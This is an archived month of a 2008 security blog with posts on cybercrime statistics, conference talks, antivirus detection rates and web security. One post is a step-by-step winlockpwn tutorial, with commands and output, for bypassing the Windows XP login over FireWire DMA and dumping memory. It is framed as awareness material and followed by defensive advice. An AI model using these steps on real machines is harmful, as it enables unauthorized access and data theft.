3/1/08 - 4/1/08 | Security4all - Dedicated to digital security, enterprise 2.0 and presentation skills

Monday

Statistics from ecops.be

The Belgian newspaper "Het belang van Limburg" reports on the statistics from www.ecops.be , the website of the Belgian Federal Computer Crime Unit.

This portal has gone online on the 23rd January of 2007 and has been running for over a year now. It's main purpose is an electronic form to report computercrimes and internet fraud.

During it's first year, 12.000 complaints were registrered. The registrered complaints were

50% was spam / unwanted emails (lottery, medicine, watches,...)
20% about electronic transaction per sms (deceiving advertising, forced sales,...)
17% about electronic transactions per internet (deceiving offers, missing delivery, ...)
10% about sales on auction sites (mostly missing deliveries)

Offenders first get a warning. If there are repeated accounts, a settlement is offered. In the worst cases, the dossier goes to court. About this, no statistics are available.

Sunday

Presentations of Blackhat Europe 2008

The media archive for Blackhat Europe 2008 is now online. There were some very interesting talks. Too bad I couldn't make it. Let's give you some titles:

Spam-Evolution Aseem "@" Jakhar, Technical Lead, IBM Internet Security Systems
Malware on the Net - Behind the Scenes Iftach Ian Amit, Director of Security Research, Finjan
Bad Sushi - Beating Phishers at Their Own Game Nitesh Dhanjani, Senior Manager and Leader of Application Security Services, Ernst & Young LLP Billy Rios,Microsoft
0-Day Patch -Exposing Vendors (In)Security Performance Stefan Frei, ETH Zurich, Communications Systems Group Bernard Tellenbach, ETH Zurich, Communications Systems Group
Developments in Cisco IOS Forensics Felix "FX" Lindner, Recurity Labs GmbH
The Fundamentals of Physical Security Deviant Ollam, The Open Organization of Lockpickers
Attacking Anti-Virus Feng Xue (a.k.a Sowhat), Technical Lead, Nevis Labs

I had a quick look through some of these. Attacking Anti-Virus was interesting but not that new (hack.lu). Last week, I was surprised that this vector is begin used in attacks/pentesting. I'm wondering that even with a get-out-of-jail card (permission), this will be legal to perform in Belgium.

0-day Patch is a novel way to determine the security of an operating system. They don't just count the number of holes and how critical they are, but also determine what they call the zero-day patch rate. They used at many independent sources including Secunia, Milw0rm, The Open Source Vulnerability Database (OSVDB), National Vulnerability Database (NVD) and CVE.
The end conclusion is that Apple is having a hard time to keep up with the vulnerabilities and the increased interest in their platform.
During the CanSecWest conference, a fully patched Vista, Linux and Leopard were the targets in a hacking contest. During the first day, no 0-day exploits were allowed. During the second day, the rules were more relaxed and in just a few minutes, the first to fall was the Macbook Air due to a flaw in Safari. On the last day, also the Vista laptop was hacked through a vulnerability in Adobe Flash.
So which one is the most secure? No one is perfect and Operating systems aren’t any more secure than the idiot using it. Use your common sense.

Happy reading!!!

Related articles:

Bonus: You can also view the presentations from Source Boson 2008 on Blip.tv here.

Saturday

Partytricks: a winlockpwn tutorial or how to log into a computer without the password

Kudos to Michael Becher, Maximillian Dornseif and Christian N. Klein for their talk 0wn3d by an iPod at PacSec 2004 and Adam Boileau (aka "Metlstorm") for his presentation on physical attacks with Firewire in 2006 at RUXCON. His memory acquisition tools and python libraries can be found here.

The whole discussion restarted some weeks ago when a coldboot attack was demonstrated and soon after Boileau decided to release his winlockpwn tool. The following is a step-by-step tutorial on how to use his tool. This tutorial is for awareness and demonstration purposes only and is provided "AS IS" without support. If you need help, proceed to the Backtrack forums.

Get the Helix CD v1.9. Some of the tools needed are on this Linux LiveCD, except for winlockpwn which you need to download. You can also do this on any installed linux version that has a firewire support and python. But you need to add a kernel module (libraw1394) and compile some tools like romtool which you can find in the package pythonraw1394-1.0.tar.gz (Python bindings for libraw1394, romtool for CSR-trickery, and the 1394memimage forensics tool).

But let's take the easy road. Leave all firewire cables unplugged and boot from the Helix LiveCD and open a root console.

I had some issues with the tool and this 'partytrick' and discovered from some websites that you need to make sure the sbp2 kernel module doesn't load. So locate "sbp2.ko" and remove or rename it.

Now, proceed to the location containing our tools:

cd /usr/local/pythonraw1394 modprobe raw1394

So, now the firewire raw interface is available as /dev/raw1394. Use the ./businfo command to inspect all the devices that are hooked up on the FireWire bus. At this point you should see your onboard firewire port.

Firewire initialized, with 1 ports available:
Enumerating port & node tree...
Port(number=0, generation=1, busid=1023, localid=0, nodeCount=1, name='ohci1394')
Node(number=0, nodeid=0xffc0)
ConfigROM(
Length : 16 bytes
CRC Length : 16 bytes
CRC : 0xd11a (Valid)
Bus ID : "1394"
GUID : 0x000d9d719f85019e
Vendor : 0x00000d9d (Hewlett Packard)

So, we see that the hardware gets properly detected. If you are not using our Helix CD, make sure you "chmod 666 /dev/raw1394".
Before we get DMA access, we must spoof our firewire device to look as a storage device.

./romtool -s 0 ipod.csr
Init firwire, port 0
Updated 1024 byte ROM image from ipod.csr

Now businfo should give you some other output like this:

Firewire initialized, with 1 ports available:
Enumerating port & node tree...
Port(number=0, generation=1, busid=1023, localid=0, nodeCount=1, name='ohci1394')
Node(number=0, nodeid=0xffc0)
ConfigROM(
Length : 16 bytes
CRC Length : 16 bytes
CRC : 0x7286 (Valid)
Bus ID : "1394"
GUID : 0x000a270002aa6ba7
Vendor : 0x00000a27 (Apple Computer, Inc.)

Good! Now you can proceed and connect the cable with your target computer. Running the businfo tool again should show you a new node on your firewire port:

Firewire initialized, with 1 ports available:
Enumerating port & node tree...
Port(number=0, generation=4, busid=1023, localid=0, nodeCount=2, name='ohci1394')
Node(number=0, nodeid=0xffc0)
.....
Node(number=1, nodeid=0xffc1)
ConfigROM(
Length : 16 bytes
CRC Length : 16 bytes
CRC : 0xbf70 (Invalid (0xb728))
Bus ID : "1394"
GUID : 0xa557565900508b71
Vendor : 0x00a55756 ()
Link Speed : 2 (S400)
Max Record Size : 10 (2048 bytes)
Isochronous Capable : 1 (Yes)
Bus Master Capable : 1 (Yes)
Cycle Master Capable : 1 (Yes)
Cycle Master Clock Accuracy : 0 ppm
Isochronous Resource Manager Capable : 1 (Yes)
Root Directory: 32 bytes, crc: 0x10cb (Invalid (0x0a69))
0 (Immediate Value), 12 (Node Capabilities): 0x83c0
0 (Immediate Value), 28 (Unknown 28): 0x50f2
0 (Immediate Value), 29 (Unknown 29): 0x2
0 (Immediate Value), 30 (Unknown 30): 0x0
0 (Immediate Value), 3 (Module Vendor ID): 0x50f2 (MICROSOFT CORP.)

So make sure you know the Firewire port number and node number. Get the winlockpwn tool and make sure it's in the correct format (dos2unix) and run it.

Winlockpwn v1.5 Metlstorm, 2k6.
Usage: winlockpwn port node target [start-end]
- Port and node are the firewire port and node numbers. Use businfo to identify your targets port and node numbers.
- Target should be one of the numbered targets listed below.
- You can optionally supply a start-end memory range to search for signatures in, useful if you're restarting, or want to limit the upper end of memory (which will otherwise walk up to 4GB without stopping). This understands anything sensible; eg 0-100M, 0xffff-0x1ffff, 1m-, 200k-1GB, -0xffff.
(Remember that you'll need to use CSR trickery with romtool to talk DMA to windows.)

Available Targets:
1: WinXP SP2 Fast User Switching Unlock
2: WinXP SP2 Unlock
3: WinXP SP2 msv1_0.dll technique
4: WinXP SP2 utilman cmd spawn

What we want is the third option. What it actually does is patch the call which decides if an account requires password authentication. This will cause all accounts to no longer require a password, which covers logging in and locking the screen. So let's proceed:

./winlockpwn.txt 0 1 3

It will scan the memory on port 0 node 1 and patch the login .dll (method 3)

Pattern: 0x8BFF558BEC83EC50A1
Offset : [2343]
Patch : 0xB001
Offset : 165
Scanning Options:
Start : 0x8000000
Stop : 0xffffffff
Pagesz : 4096
Init firwire, port 0 node 1
Snarfin' memories...
Checking for signature on page at 0x3097f000 (796156kB) at 43462 kB/s... Found signature at 0x33104927
Setting up teh bomb... Donezor!
Verified evil: 0xb001
You may proceed with your nefarious plans
Elapsed time 16 seconds

Voila !!!! Just try to login with any password. I also tried it on the local administrator account of my laptop and it simply works!!! Firewire = pwned.

Now if you are a forensics investigator, you also can do a memory dump at this point. After the '1394memimage' command give the Firewire Port and Node number and the location where you want to save the image (an external storage device of course).

./1394memimage 0 1 /media/sdd1/memory.bin -1024M

Make sure you don't exceed the total memory amount or the system might crash.

That was it folks. Remember, even if you disable onboard ports in the BIOS, just plugging a PC Card into the laptop is enough to circumvent it. I bought a 4-port 1394 PC Card (brand Hama) at the local mediamarket for 7€ and it didn't need any drivers. Plug & pwn.

BIOS passwords aren't a good idea anyway. On Boileau's site, I saw another tool bioskbsnarf. The tool he used to steal his own BIOS password; python code that parses and prints the bios-real-mode-keyboard-interrupt-buffer . Use with /dev/mem or a memory image acquired via firewire.

Replacing BIOS chips, social engineering the vendor support helpdesk for a recovery procedure etc.. are just ways to circumvent BIOS passwords.

Now how about other operating systems?

After my firewire demo at the security conference, a lot of people came to ask me if this also worked against Linux. So I did some research. The first Firewire DMA-based hack was the 2002 FireStarter attack by Quinn "The Eskimo". Apple modified their drivers to disable device DMA by the time OS X10.3 came out.

At some point, Linux made the same fixes. So they should also be safe (this is unconfirmed on both accounts). Microsoft was informed about this 2 years ago and up until now, nothing was done. Microsoft does not view FireWire DMA as a security problem, since it is part of the IEEE-1394 specification. According to Boileau, this is the reason why Redmond is not considering a fix. By the way, it will also work against Vista.

How about USB devices?

Unless there is a bug in the USB drivers (like a buffer overflow), it's not feasible using the straight USB protocol, however, firewire protocol does include DMA (and that's the problem)

Cardbus cards are effectively PCI cards and can perform arbitrary bus transactions. This can probably be used to bypass OS security.

Well, another thing that comes into mind is autoplay!!! According to Microsoft's 10 Immutable Laws of Security:

Law #1: If a bad guy can persuade you to run his program on your computer, it's not your computer anymore

What is the solution?

Well, there is no silver bullet. Just adding as much as layers of defense as we can/

Disable Autoplay
Use harddisk encryption software WITH a pre-boot password
Disable the Standby feature (considering the cold boot attack) and also hibernate if you don't have a pre-boot password
Disable unused ports in the BIOS , bootable usb devices and password protect it (this can be circumvented but let's annoy the attacker as long as we can)
Glue the firewire port shut (?)
Disable all Firewire ports and PCMCIA slots in the Device Manager (although I read that PCMCIA devices are bus-masters once connected, so there is very little the CPU (commanded by the Operating System) can do to prevent rogue devices that are using these interfaces from accessing arbitrary memory addresses)
Always secure your laptops physically with a cable lock (can also be circumvented)
Shut down your PC if you leave it unattented
Use a data classification system and inform users not to store VERY confidential information on portable systems (though some people will ignore this policy)
If the previous point is not possible, separately encrypt those sensitive files with another tool.
Pray that Microsoft will release an updated driver
Feel free to suggest other methods yourself...

Bottom line: there is no 100% secure solution. Just adding enough layers of protection and hoping that an attacker will give up. Having a second look at Microsoft's 10 Immutable Laws of Security, shows us:

Law #3: If a bad guy has unrestricted physical access to your computer, it's not your computer anymore

Against the coldboot attack and the issue of whole harddisk encryption, there are no definite solutions. And more and more tools based on this attack are getting released:

DaisyDukes is a memory sniffer that resides on a USB device. A researcher can plug it into an unattended machine that is turned on but has been locked and reboot the machine off a compact operating system contained on the drive. Depending on the user's needs, it can be configured to capture the entire contents of a computer's memory, or sniff out only certain types of data - say a password to access the company network or unlock a user's private encryption key.

It turns out both Windows and Linux retain "boatloads and boatloads" of passwords in memory, said Sherri Davidoff, a security analyst with IntelGuardians, the penetration-testing firm that developed the tool. It's already been able to isolate passwords for Thunderbird, AOL Instant Messenger, GPG, SSH, Outlook, Putty and TrueCrypt, among others, and with additional research they believe they can find many more.

"The idea here is let's see if we can hit an office building, get in and out in 25 minutes or less and walk out with some interesting passwords," said Tom Liston, an IntelGuardians security consultant who along with Davidoff co-presented the tool at the CanSecWest security conference in Vancouver. (Source: TheRegister)

What is enterprise 2.0?

My fellow blogger Karim got inspired by the slideshare about Enterprise 2.0 I posted and made a nice post about it: Welcome to Enterprise 2.0, embrace it!. He provided a nice overview of what enterprise 2.0 entails:

Enterprise 1.0	Enterprise 2.O
Hierarchy Friction Bureaucracy Inflexibility IT-driven technology / Lack of user control Top down Centralized Teams are in one building / one time zone Silos and boundaries Need to know Information systems are structured and dictated Taxonomies Overly complex Closed/ proprietary standards Scheduled Long time-to-market cycles	Flat Organization Ease of Organization Flow Agility Flexibility User-driven technology Bottom up Distributed Teams are global Fuzzy boundaries, open borders Transparency Information systems are emergent Folksonomies Simple Open On Demand Short time-to-market cycles

I just happened to stumble upon another blog: "cazh1: on Business, Information, and Technology". He has some experience with enterprise 2.0 and if you are interested in the concept, check these posts out:

Presentations from infosecurity.be 2008 are available (UPDATED)

The other presentations from the seminars on infosecurity.be are available. I noticed a few are missing but I will be updating the links as they are uploaded. Some have a really nice design although several slides seemed a bit crowded to me. The mantra "less is more" should apply here. Here are some articles from presentationzen.com that might clarify what I mean.

So let's give you the links to those presentations. (UPDATE: fixed the links)


		Howard Schmidt - The changing face of information security threads

		Amanda Jobbins - Changing IT Landscape

		Bruno de Vuyst - Software patents

		Bruno de Vuyst - Software Patents (PDF)


		Marc Vael - Security Convergence

		Philip de Wolf - Crisis management within business Continuity

		Sebastien Deleersnyder - Webapplication Security

		Suzanne Janse - Governance Risk & Compliance

		Tom van de Wiele - Anti Forensics

Apple, don't be evil

After months of deliberating, I have decided to buy my own laptop. Not just any laptop, but a Macbook Pro.
I never wanted to own a laptop because I'm a poweruser. I need the best performance for the buck and laptops performance wise were always behind compared to desktops. This has changed somewhat in the last years and prices have really dropped. Now that I go to security conferences, I felt the need to get my own laptop. The one from work, although fully encrypted, sometimes contains confidential information. But we have seen that harddisk encryption is not all that. Also, the possibility to deactivate the virusscanner on my company laptop was revoked and this has become a major pain in the b*tt.
Why would I want to to that? Even temporarily. For example, McAfee classified the security tool 'winlockpwn' , a python script, as a virus (which is really stupid). They should have marked it as unwanted programs like most hacker tools. During my last demo, I found this out the hard way. The script was deleted when I inserted my USB stick. So, with my own laptop, I have some more control over it's usage and can install all the tools I want.

There are more reasons like my newfound passion for presentation making , the itch to try out Keynote from Apple and the nice design of the Macbook (hello backlight keyboard). Also watching all those keynote presentatons of Steve Jobs got me a little brainwashed. But....

*sigh* *double sigh*

Why, oh why did they to the following? First, they forced safari as an upgrade (even when not installed) through the Apple Software update service (which everyone with Quicktime or iTunes has).
Then we saw two new vulnerabilities, that Safari windows had including the possibility to inject malicious code. And finally, it seems it's completely unstable and crashed in Windows XP.

All this for software most people didn't want to have? No wonder the Mozilla CEO called it a misuse of trust. It's hard enough for users to keep up to date with patches without misusing update services.

I'm really disappointed in Apple. I almost cancelled my order. Let's hope this was a one time mistake.

UPDATE: It even seems that the Apple EULA doesn't even allow Safari to be installed in windows.

Podcast: Blue Box #77: Skype security vulnerability, German gov't looks at trojans, undersea cable cuts, Microsoft and Yahoo, VoIP security news and m

Goodies, a new Blue box!!!

Welcome to Blue Box: The VoIP Security Podcast #76, a 36-minute podcast from Dan York and Jonathan Zar covering VoIP security news, comments and opinions.
Synopsis: Blue Box #77: Skype security vulnerability, German gov't looks at trojans, undersea cable cuts, Microsoft and Yahoo, VoIP security news and more
Download the show here (MP3, 17MB) or subscribe to the RSS feed to download the show automatically.

Why hacking changed and 90% of sites are still vulnerable

Let start with the Hacker Webzine: "Why hacking changed" and "why hacking change part 2". You really need to read those 2 marvelous pieces. An excerpt:

Today everything is software, even in the form of virtual hardware. The network today is no longer the main landscape for attack. Take the firewall for instance. Without the firewall, hacking was a walk in the park. Anyone with a dial-up modem could hack. Launch a telnet client and you had a very good chance that port 23 was open. Along came the firewall and now we have 99,99% of all ports blocked. Only port 80 and 25 are open if you are secure. So, most of the network is secure and does not pose an issue anymore. While the firewall is here, everyone in security fell asleep. We thought we were secure now right? the firewall and the IDS and other stuff is monitoring it right? Yes, that was the old view of security. That view is dead, and buried with the old school hackers because this isn't how the Internet operates today. What is happening now, is that the whole security of every server depends on the programmer that writes software. Software is the main culprit of almost all hacks today. If you can define hacking today, it no longer means telnetting into servers or blowing whistles, but exploiting the application layer. With the application layer, I also mean the scripting language beneath it, since it interacts with the applications that it's running and share memory, and thereby the hardware it's running on.

So the firewall and IDS is dead? (So might Antivirus but let's not touch that hot potato today). But the whole security of the server depends on the programmer who writes the software? Well, in that case, I have bad news for you!

After years of fighting the hacker wars, today's Websites are still a long way from being secure, according to a new research report. According to a report issued yesterday by WhiteHat Security, nine out of 10 Websites still have at least one vulnerability that attackers could exploit. On average, there are about seven flaws on each site studied. "While the security posture of some industries is better than others, the difference is largely insignificant when it comes to preventing a Website from becoming compromised –- attackers only need to exploit a single vulnerability," the report says. (Source: Darkreading)

So how to fix this? Here is an interesting article from techtarget.com: The essentials of Web application threat modeling. The highlights:

Determine your security goals
Document the general architecture of your application
Outline what really needs to be protected
Pinpoint the various entry points and "trust" zones
Discover what can be exploited using a malicious mindset -- from both the perspective of an untrusted outsider and a trusted user.
You'll never find or think of everything no matter how analytical your team is or how good your tools are. That's OK. Just go for the basics now. It doesn't take long to realise that the majority of Web application vulnerabilities are related to input validation, system configuration problems, and insiders abusing privileges they probably shouldn't have, including the following:
- Cross-site scripting in search forms or message boards
- SSL not being used or enforced throughout the application
- Weak password requirements
- Lack of account lockout after so many failed login attempts
- Informative authentication errors being returned to the user, resulting in username and password harvesting
- Weak mutual-factor authentication processes implemented per the Federal Financial Institutions Examination Council (FFIEC) requirements
- Session keys and cookies not expiring or being easily manipulated
- URL and/or form-field manipulation to bypass authentication or escalate privileges
- Sensitive information returned in server errors that can give an attacker a leg up on penetrating the system
Also, you may want to check out Microsoft's threat model called STRIDE that highlights the important areas of most applications:
Spoofing identity
Tampering with data
Repudiation
Information disclosure
Denial of service
Elevation of privilege
Determine what's urgent and important
Determine what can be done about each weakness

Read the full article for all the details. Also check out the OWASP Top 10 2007.

The OWASP Top Ten provides a powerful awareness document for web application security. The OWASP Top Ten represents a broad consensus about what the most critical web application security flaws are. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. There are currently versions in English, French, Japanese, Korean and Turkish. A Spanish version is in the works. We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications do not contain these flaws. Adopting the OWASP Top Ten is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.

Wednesday

Advice for home users

Yesterday, a teacher contacted me about my presention at the security conference because she wanted to use it in her class (or at least parts of it). Since a lot of the content is focussed on corporations, I found it somewhat unsuitable without a major remake. Although the part about drive-by downloads in the presentation is relevant for home users. So after some brainstorming, I decided to give some relevant links.

First of all, the SANS Cyber Security Awareness Month is a wealth of information on several topics. Also "Patching, Damned if you do, Damned if you don't" provides several tools to help you update your entire PC (not just windows update).

Then, I found a very userfriendly designed guidelines from McAfee (note that I'm not sponsored by them). But the documents on their site looks really nice and could be useful. Let's start with the 10 step internet safety plan for your family (pdf).

There are several more documents over at the McAfee Security Advice Center.

UPDATE: Here is another resource: http://www.staysafeonline.org/ (Thank you Andy for the link)
And thanks to Brian for the following link: http://www.webwise.ie/

New version of Nessus and Nmap

Nmap 4.60 has been released. The changelog has more than 60 important changes since 4.50. This includes a new and shorter URL (nmap.org rather than insecure.org/nmap/), massive OS detection and version detection signature updates, many new Nmap Scripting Engine scripts, bug fixes, performance optimization, and more. It is available now from the download page.

And not only nmap got an update, a few weeks ago also Nessus got an upgrade.

Tenable Security released the new version 3.2.0 of their Nessus vulnerability scanner about two weeks ago, and it's one tool no security pro should be without.
If you’re not familiar with Nessus by now, you’re either brand new to IT security or you’ve been living under a rock. I’d be willing to bet that three out of five security pros have used some form of Nessus, whether it was the freely downloadable version from Tenable or some version embedded in a security product. Heck, you may have even received an audit from a consulting firm that listed all your vulnerabilities in a ridiculously long report -- the simple output from a Nessus scan.
Nessus is a great, free, and very powerful tool for vulnerability scanning. It includes vulnerability and information plug-ins for thousands of services and operating systems, so initial usage can be a bit daunting for new users. And you should definitely test it in the lab -- some checks can have an adverse effect on network devices such as printers and power distribution units. I’ve seen printers and servers both go offline because the power distribution unit rebooted itself during a Nessus probe. (Source: Darkreading)

BONUS: httprecon is a tool for advanced web server fingerprinting.

The httprecon project is doing some research in the field of web server fingerprinting, also known as http fingerprinting. The goal is the highly accurate identification of given httpd implementations. This is very important within professional vulnerability analysis.

Besides the discussion of different approaches and the documentation of gathered results also an implementation for automated analysis is provided. This software shall improve the easiness and efficiency of this kind of enumeration. Traditional approaches as like banner-grabbing, status code enumeration and header ordering analysis are used. However, many other analysis techniques were introduced to increase the possibilities of accurate web server fingerprinting.

2 new members in the Belgian Security Blognetwork

I'm happy to announce two members to the Belgian Security Blognetwork (RSS feed): "Digital Forensics and more" and "/dev/random". Respectively, thank you An and Xavier to join us in the feed. I'm convinced you'll contribute interesting material.

"Digital Forensics and more" lists some interesting books and has a Google calendar with an overview on security events.

"/dev/random" keeps track of interesting *unix and belgian related security topics. He provides some good practical tips.

Thank you guys (and girls) and keep up the good work!!! Subscribe to our RSS feed.

Welcome to security 2.0

| View | Upload your own

Everything is increasing -- bis

In "Everything is increasing", I gave some statistics on Antivirus detection rates. I just wanted to add this one from http://winnow.oitc.com/malewarestats.php. Read the previous article before you look at it.

When a piece of Malware is detected by the Malware Incident Reporting & Termination (MIRT) team, it is uploaded to VirusTotal for analysis. The performance of each antivirus engine is monitored by CastleCops. Once an hour, the system checks for updates. If there are some, the information on the performance of the 36 antivirus engines on all the detected malware is accumulated and statistics are updated for display by OITC.
The statistics provided here are an indication of the ability of the AntiVirus system's ability to deal with near 0-day infections. The performance by each antivirus system on early detections do not reflect the overall performance of an antivirus system. Consult with your IT department or computer security specialist for a more detailed analysis.
These performance statistics have been accumulated since Saturday, 2 December 2006, e.g. for the last 480 days. The most recent malware was detected and processed as of Tue Mar 25 18:27:07 2008 EDT.

AntiVirus Engine	Detection Rate
AVG	26%
AhnLab-V3	7%
AntiVir	66%
Authentium	15%
Avast	20%
BitDefender	50%
CAT-QuickHeal	31%
ClamAV	16%
DrWeb	29%
Ewido	28%
F-Prot	15%
F-Prot4	18%
F-Secure	43%
FileAdvisor	9%
Fortinet	56%
Ikarus	53%
Kaspersky	46%
McAfee	24%
Microsoft	20%
NOD32v2	37%
Norman	25%
Panda	53%
Prevx1	23%
Sophos	29%
Sunbelt	38%
Symantec	25%
TheHacker	9%
UNA	10%
VBA32	33%
VirusBuster	19%
Webwasher-Gateway	80%
eSafe	50%
eTrust-InoculateIT	5%
eTrust-Vet	14%

Bear in mind, this is just one test, one statistic. Don't make any rash conclusions. on it. Anti-virus software is no substitute for common sense. AV software will not save you from infecting your PC if you ignore best practice: Do not click on links or open attachments that arrive unexpectedly in e-mail or instant message.

Tuesday

Don't make life difficult

Being a good storyteller can help you give a good presentation. Don't make life difficult: No Tech Hacking. I really enjoyed this video from Defcon. Give a show and use images, not bullet points !!! His book just jumped several places on my wishlist!! ;-)

If you made it through the entire presentation, let's give you some more low-tech tactics. Everyone knows the smoker backdoor tactic? Go for a job interview. Tailgating. Once inside, plant a rogue access points

Once inside, hardly anyone asks you what you are doing there. Not to mention that people are not used to question your authority if you politely explain to them that you are performing a security penetration test which aims to break into their networks. The truth is that humans can detect suspicious activities by following your body language. The more you lie the the more negative messages you are sending to the people around you and of course the higher is the chance to get caught. So, being honest is actually a plus rather then a minus.

Even having access to a conference area is quite easy as you can arrange supposedly important meeting with someone from inside. Usually you find the network jacks underneath the table where you can connect whatever needs to be connected.
...

When we were once asked to break into some organizations, which names we cannot disclose, we went exactly the opposite way of the expected. We researched the company and found all other companies they work with. Then we went onsite and discovered that some of these companies run open wifi networks for guests. It did not take us long to obtain access to sensitive mail, through leaked POP3 credentials which also got us a VPN access and other goodies.

(Source: The state of Wifi security -- Gnucitizen

Sweet. Well staying in the realms of Wifi (well sort of), let's look at Evil twins.

Just like in WiFi security, Evil Twin attacks are all about impersonating someone or something. The reason why this scenario was mentioned was because we did had a go once with it (tiger teams do all sort of cool and useful things). Then we found out that Paul and Larry also tried Evil Twin attacks against Twitchy and they all proved to be more then successful as we’ve promised in our blog post.

But is that all? Just Evil Twin attacks? Well NO! Definitely not! We are just at the beginning of a whole new brave world. For example, when I approach social networks I try to look at them from Information Architecture point of view. I try to see the hidden connections between things and people and make my own conclusions depending on the my goals. And the tools are quite different and I will definitely recommend a few and even release some of my own which were built to server different purposes. (Source: Social networks, Evil twins and puppet masters -- Gnucitizen)

Read the entire post for some interesting information. Remember, don't make life difficult, think low or no tech hacking.

Everything is increasing

It's not only our food prices and gasoline prices that are rising, botnets and malware are also on the rise. In my presentation, I mentioned that this has become a well organized industry. But how well are they organized?

Brian Krebs did a piece on Antivirus firms struggling to keep up and the next picture tells it all:

The rapid increase of viruses and other malware has forced the anti-virus industry to overhaul its traditional approach writing its software, with the result that security products on the market today are far more powerful and sophisticated. But many observers say that despite all its new bells and whistles, the anti-virus industry as a whole continues to fall behind in identifying the very latest malicious software.
The challenge, security experts say, is that criminal groups responsible for manufacturing most of the malicious software in circulation today are reinvesting their illicit profits in research and recruiting talented computer programmers. A special emphasis is placed on creating malware that coexists peacefully with an infected computer system, doing its work quietly in the background.
"A lot of these [malware] shops are now hiring professionals and doing quality assurance work, things that generally make the job of the anti-virus researcher that much harder," said Randy Abrams, director of technical education at ESET, an anti-virus company based in Bratislava, Slovakia.

Quality assurance? Research and Recruitment? Looking at the graph, we see that there was an exponential explosion by the end of 2006. Seems they are having more luck to recruiting IT personnel then some of our companies are. Now a 100% protection rate against malware is unrealistic but a lot of people think that AV products gives them 90%-95% detection rates. As you can read in the next part, this is not the case:

"The problem is that we have this ongoing, unrealistic expectation that somehow we are going to detect 100 percent of the malware out there, when in fact what we have today is slightly less detection than we did, say, in the mid-1990s, when we were actually catching 70 to 80 percent of the new threats," said AVIEN's Harley.
For security researchers on the bleeding edge of defending information networks, even those less-than-stellar numbers may be seem a bit inflated. Jerry Dixon, director of analysis for Team Cymru, a security research firm in Burr Ridge, Ill., said his team recently submitted more than 1,000 samples of brand new malware for scanning by 32 different commercial anti-virus products from around the globe. The result: Only 37 percent of the programs were detected as malicious by any of the products.
"The real challenge here is for people to get it through their heads that anti-virus is not a panacea, and that it's always going to fall short of identifying threats in real-time," said Trend's Perry. "The challenge for us as an industry is to try to change that perception, while at the same time integrating new threat mitigation features into our products."

Read Full article.

I want to refer to two other papers, the first one was mentioned last month in The efficiency of anti-virus. There we could see the three virusscanners in the Google paper achieving detection rates ranging from 30% to 70%.
The second paper was from the German Honeynet Project "Chinese Underground Economy", were they spidered the top sites displayed in google.cn. There they used 9 virusscanners to scan dropped binaries and the best virusscanner out of 9 had a detection rate of 83.6%. The other AV engines scored lower then that. These figures seem somewhat consistent with the number mentioned in the article above.

Now more specifically on the topic of botnets, I saw the following article from Zero Day Threat: Botnet saturation points to rising crime.

Our USA Today cover story today on botnets saturating the Internet revealed Support Intelligence’s astounding finding that, on any given day, 40% of the computers connected to the Internet are engaged in delivering spam, implanting malware, harvesting data, launching denial-of-service attacks and generally causing mayhem. On some days that rate spikes to 70%, says Support Intelligence CEO Rick Wesson.

That’s nightmarish.

IDC estimates roughly 800 million computers are connected to the Internet. A healthy Internet, says Wesson, would have less that 1 %, or 8 million machines, botted. On an average day, Wesson see more than 300 million bots engaging in nefarious activities.

Those figures seemed to be somewhat on the high side, or are they?

In 2007, some 25 percent of major Vietnamese websites are vulnerable to hackers' attacks, and 95 percent of personal computers were infected with viruses.

According to BKIS (a leading local network security center in Vietnam) surveys, last year, 342 Vietnamese websites were attacked by hackers, of which 224 websites were hacked by foreigners. Meanwhile, over 33.6 million computers were infected with viruses, causing estimated losses of 2.4 trillion Vietnamese dong (150 million U.S. dollars). (Source: people.com.cn)

So that's for Vietnam only. So 300 million bots may not seem completely impossible. I'm a bit interested to see some figures like these from European countries. I'm gonna finish with an article from Zdnet Asia: RSA sees increase in fast-flux botnets. In the article, researchers from Cambridge don't seem reach the same conclusion and state that the number of botnets have remained stable during the last year. I'm not saying they are incorrect but I'm going to show you the latest graph from shadowserver.org :

UPDATE: Added a small part 2: Everything is increasing -- bis

Monday

Random notes from Taosecurity

Richard Bejtlich from Taosecurity (one of my favorite blogs) has provided some interesting bits of information lately originating from his conference visits.
I can't say the same. Security conferences over here are at a low point. Sure, there is Blackhat Europe this week but that one comes with a hefty price tag. I have to wait till November and December until hack.lu and 25C3 are coming. I'm a bit curious what the 25th edition of the Chaos Computer Congress will provide. But I'm digressing. Here are some pieces coming from Ten Themes from Recent Conferences, Black Hat DC 2008 Wrap-Up and Thoughts from Several Conferences.

His ten themes describing the state of affairs:

Permanent compromise is the norm, so accept it.
We can not stop intruders, only raise their costs. ‏
Anyone of sufficient size and asset value is being targeted.
Less Enterprise Protection, more Enterprise Defense.
Less Prevention, more Detection, Response, Disruption.
Less Vulnerability Management, more System Integrity Analysis.
Less Totality, more Sampling.
Less Blacklisting, more Whitelisting.
Use Infrequency/Rarity to our advantage.
Use Blue and Red Teams to measure and validate.

Team Cymru's Internet Malicious Activity Map. (per Class A subnet)
Oliver Friedrichs from Symantec will release his upcoming book Crimeware, some of which is described in this post.
Nitesh's statement in Social Engineering Social Networking Services: A LinkedIn Example
Sinan Eren from Immunity described how his team conducts "information operations:

Attack the anti-virus/spam filter on the target company's mail transfer agent.
Hook the AV to grab copies of all email. (Feeling good about that AV scanner now? Hey, it's defense in depth! Add more, you're secure! Not only does it not work 2/3 of the time, it's an avenue to be compromised! Argh.)
Analyze email to understand the target.
Inject forged email into ongoing thread between target and customer. Include malicious attachment.
From target's computer, exploit DNS MSRPC vulnerability in target's PDC.
Grab hashes, exploit other hosts. Find files of interest.
Identify special network segmented from current network but accessed via USB drive.
Modify USBDumper to acquire files when drive is moved from first network to special network.
All interesting data transferred via Immunity's "PINK" C&C channel.

Sinan concluded by recommending we invest in human capital, not security products
Why we bother blocking anything but specific IPs outbound. All we've done by restricting outbound protocols is force everything to be SSL-encrypted HTTPS traffic

These are the bits I liked and wanted to keep track of. Read the three original articles for a complete view.
Okay, using AV to own the gateway, using social media as intelligence, using outbound ssl as covert channel, the need for user awareness, some of these sound familiar. ;-)

And don't forget to have a look at Richard's blog from time to time!! ;-)

Sunday

Another example of an targeted attack: Tibet protests. (UPDATED)

